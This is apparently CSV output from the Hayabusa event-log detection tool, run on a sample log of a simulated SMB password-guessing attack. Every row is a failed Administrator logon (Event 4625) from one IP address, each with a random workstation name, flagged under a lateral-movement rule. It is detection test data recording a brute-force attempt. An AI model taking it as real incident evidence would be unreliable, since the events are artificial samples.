2016-09-20 01:51:09.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K0Mp4jXeHd3b0CLw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3j89GmIDnG4v7JJC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.512 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xyRLZMoaXJUrPPfn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZcoyOKUjEi1uCSpD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jWQGVJLcVwgf4YJ8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mrFqG85mmjTYJ4A9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6DqIh1QHTk470nrU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: feVbA94p6iT2pBeC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: T30YHcE8ZG7FaxW7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RaKHRwYtx2lGtOCG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zDEDuMmlDZZfdkFD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:09.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CObqGJQi1hOOI83J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.002 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EhsE9bQeEwW21bAj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: El1qxgjvGS0QSS4Y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vtlr3HwzJcAfSxuO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KDayr44iXmE63vqd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FkNoLVOhnS8ayujK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3ggg78jjziKqijrT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BodeSVqeqa5qBQDL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.362 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yY7yxEcuGwWSJZV2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.406 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oTlg6cvsz6Z6QpCp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: V3pTALzqu4Ok6CUR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kdGagQIEcvQQMp4n  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fVu4reOyQEIkChHO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EJWNS69MmMGLSnHc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nPaR2sBxPPCjxpL0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kJJ9A1EfqM4V2TRv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4dxf59xjpxO3oG17  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: o6dMI12g4tjSF8PX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZAqN0xPaW4jg2Kjc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mcnReyIEaqsQfowV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: akOH8Y7XdjOpqTez  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b0HOK1TIqloud7gh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:10.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: n6uIAK55BmTnA6Bf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.042 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZDnn6QmLOJ6KwzKt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: np8KaRJvRqBrGyFL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dxbu69Amr6gWN5Hw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LoZdaFJWNON8Ujnc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: q4RSlXgOS7sssCqU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: j2PJprE7olK4pjrx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jQOAUcWQL32y2gGe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nXI0wWwzhHN0uvOP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.414 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ujGqTzfOhmKgoAjt  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cFoPtWZ03O3ZZgOC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EyO2VTnpGZLeSIvr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ua69MEWABQ9hsooT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ubPQWn4nQYr3rXr8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xrgATdNqkA44nKqf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qKwktiUfTWakNx3I  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xVebPFnWhbZKIANs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IyV8stIvfXLJQpsn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uStfvm0y0eZrWONH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OUwTyUXe8NLG7bCS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:11.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HQuDp8aZpWDANKMe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GQKTlzx2gq9ayAtJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tCzVponBvb9mbyIr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mSwnrFv90KjN2cqj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QX5TLs2MPkia1cmk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ammLKlG1Q5awQGvN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SJ1ijJjPJbF4uFlo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZOLnwIzpGz03Yjh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xS8U3UQNz6l0LZn0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.361 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: no6cftQ5MF1fjZ0y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5WHS6jVRnCUH0Rb5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: i3oGLwrCJXJOauf6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.477 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I1sxPrDYV3rr4pGJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Osysh2O2A3A2bN22  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FsInW9EMJZU8FOrF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ge8do8TM4GG1atMx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4w5GLbpVsAhGqCiq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8eQXeW1VpRU0ptMs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:12.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NhLosoA2parzTnW9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
